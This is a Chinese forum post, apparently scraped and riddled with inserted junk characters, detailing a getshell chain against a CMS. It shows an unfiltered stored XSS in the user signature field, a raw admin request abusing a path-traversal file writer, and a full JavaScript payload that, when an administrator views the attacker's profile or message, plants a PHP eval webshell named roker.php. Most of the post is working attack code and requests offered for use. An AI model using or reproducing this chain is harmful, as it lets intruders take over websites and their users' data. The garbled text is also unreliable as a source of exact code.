|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
0 |' s2 l& g! `: Z! j3 Y" ?- c4 w官网已经修补了,所以重新下了源码
+ [3 |. s x3 s( e3 T. g因为 后台登入 还需要认证码 所以 注入就没看了。! ?3 k8 i8 Y6 U2 [* Q; {. N
存在 xss
& W* N- C6 q2 |% I' D, q漏洞文件 user/member/skin_edit.php
# s( R* Q d; L1 b( [) `% q本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:5 x6 d- u# F9 k4 y! y
. z, V/ p& ~1 w* ^/ A
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
5 [3 O G5 w* L9 C1 ~, [$ ~" h7 L, O; ]
! i2 ?( B5 S2 B% N$ d5 d) c* [</textarea></td></tr>) ~$ ~# O( N& h3 V* b
% d! o4 ?" x* {+ x+ u+ B
user/do.php % `) Q3 [7 @) [2 h
% y7 X# w" [; l# X( i' m
, P& _: x% A# Z& J; }& \/ r+ @: Rif($op=='zl'){ //资料
1 A8 @/ g5 `8 E6 f7 K5 E+ u
9 y6 \! F: v, R0 F! F; N+ |, m if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 7 p. X' R* P/ ?# u/ X
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); a9 k! i' j2 r- k
; v, m, c6 o' R $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, M4 [4 I9 K& s2 @. ` + S$ G z( N: |: L3 c& R; g% x+ q2 P
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- |; D }" ? S# T& ^* s: z8 D
where CS_Name='".$cscms_name."'";% ^$ X1 V0 K/ @: r
6 }& K# w* ?% q' a4 N) V; S
if($db->query($sql)){7 A5 K, `+ X; U, H
) \ U: a, q7 d( e# U& p+ p3 ]
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
! Y/ ~ Y5 J2 I; P) r) K0 I " W# J& P% b$ N1 r6 b
}else{ w$ Y% r. Y5 ~$ w0 X4 l4 l' b% y {
3 x" o7 B: T4 g7 Z
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));! Y' n5 D. M5 u2 h- E
+ c! x/ x, H; p& `' M- v
}
& ~. |7 |% l) j S" V, r1 R9 S: N/ v/ Y0 b& ?! Q! M/ K) A
9 F0 q( w* v5 d' |% s
没有 过滤导致xss产生。
: Q1 y' C G6 z后台 看了下 很奇葩的是可以写任意格式文件。。
6 x2 f V7 l5 ~' l! }: ~抓包。。
2 j8 ]" C3 y8 V! M- \
1 _8 g7 o& D% O' F) c
, d- j; }$ r" S7 r/ [/ r7 d本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
7 R! U4 a0 x# B3 \, k- @/ H
5 U2 o9 u+ T9 f) H" X( l) K( oAccept: text/html, application/xhtml+xml, */*4 y( l( U8 ~; l
$ ]' }0 A3 J- j, \0 k
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* e; E. t& d, j; U 9 r) B5 Z. U! F4 N5 A' Z) P" `
Accept-Language: zh-CN
, P2 Q6 e0 j& v* P& q8 p( W$ p ' J0 c2 Y7 K, p2 V8 O3 p
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
. W' ]) ^ u S2 l; T- x8 ^
3 H+ j H6 ~, V; a9 X8 q0 m1 MContent-Type: application/x-www-form-urlencoded8 O4 [6 M% R1 K! X
% }& W: z% q8 G& GAccept-Encoding: gzip, deflate9 F0 a% A2 W! }) m4 a6 U
! ^' G* n( i7 D- i3 Y G9 S
Host: 127.0.0.1; N7 c; _& b6 Y. h" B
4 v( C" U& y, z NContent-Length: 38
* }- B( X9 H$ e9 Z( C+ \: H& ? + B# z9 i& z7 R0 h- L5 f
DNT: 11 M* o% ?! b Q$ _# V
4 w2 O5 u/ P+ a: I
Connection: Keep-Alive
: u9 `; b$ P; @7 d" ~) ?- [2 P
8 O: j' ?2 U7 tCache-Control: no-cache
% d& O( T$ m3 v# K 7 O8 K5 G+ c; e
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655948 j$ {, j3 F: u# S
% G; L6 t& y4 W# h& \
$ m; Z- |5 K1 ^name=aaa.php&content=%3Cs%3E%3Ca%25%3E
/ r* F2 U/ m& y+ k
5 G) m3 i- K$ X: m3 I4 B8 t& ?: ]# T- l
P3 F; P4 k6 b' n于是 构造js如下。$ u8 b3 G; N3 Q6 @) s% V4 L$ A5 G! j
, d/ ~' v6 e7 X+ @! k$ p本帖隐藏的内容<script> . T4 r4 p2 X [( _
thisTHost = top.location.hostname;
2 i, k/ w5 Y# N, h! Z
, ?1 R1 P( f6 ~( ]2 q! x6 kthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
3 e/ ?3 z1 S/ Q" s! I( o
: t# ]% R+ G; S# S9 {function PostSubmit(url, data, msg) { % J" p& [1 \4 X8 z
var postUrl = url;/ t- @4 L; ?% @: k1 h4 F# l7 }: o
+ F/ z9 U1 p8 s var postData = data;
|' s# ?: u% x8 \ var msgData = msg; 2 u3 {+ Q; f" Q7 X7 |: T
var ExportForm = document.createElement("FORM"); , |) ~+ @9 `4 k% S9 X% R5 Y3 i$ D
document.body.appendChild(ExportForm);
' a. d( F4 l! w# \4 W7 ] ExportForm.method = "POST"; 2 ^& h8 T9 h# y6 g. | d7 V
var newElement = document.createElement("input");
7 a6 H5 I2 E- P' ^ newElement.setAttribute("name", "name");
! [* L% ]) t5 Y# D newElement.setAttribute("type", "hidden"); 2 b; @2 t9 A7 ~& m
var newElement2 = document.createElement("input"); 2 X; \+ N5 L/ V2 U( ~
newElement2.setAttribute("name", "content"); ! C" E7 e. {! N) I
newElement2.setAttribute("type", "hidden");
2 i8 m# w5 P! @. l5 t& K. F c ExportForm.appendChild(newElement); " i4 `+ t% @6 d- }
ExportForm.appendChild(newElement2); 5 u$ D1 z1 U: [2 |% ]
newElement.value = postData;
& X5 y6 q# N8 U. e1 x# Q newElement2.value = msgData;
4 D0 \& r2 U/ e; n/ B/ L ExportForm.action = postUrl;
# [% m- }2 q* I. L* ]7 I! j: E ExportForm.submit(); + r2 @) @3 B0 e5 f
};9 J" H+ z/ o M! F, p
- s# a0 ~- [" p/ `. Y
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");' C" ]" c6 z" `3 j
/ `4 t2 R, s1 o' E7 j. y
</script>: w8 _! i: i/ x& q
! R5 f6 _/ ~: v3 ^0 {, [+ S0 }+ i! P" ^) j1 f0 l
7 Q( ^; i s4 C! q# A3 G( E5 Ahttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入* z: D! W9 t( B5 n# L
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
' q" G& R/ a8 D# Y+ c: o就会 在 skins\index\html\目录下生成 roker.php 一句话。 | " |/ ^ z9 I6 N0 ]% F: A6 k
|
|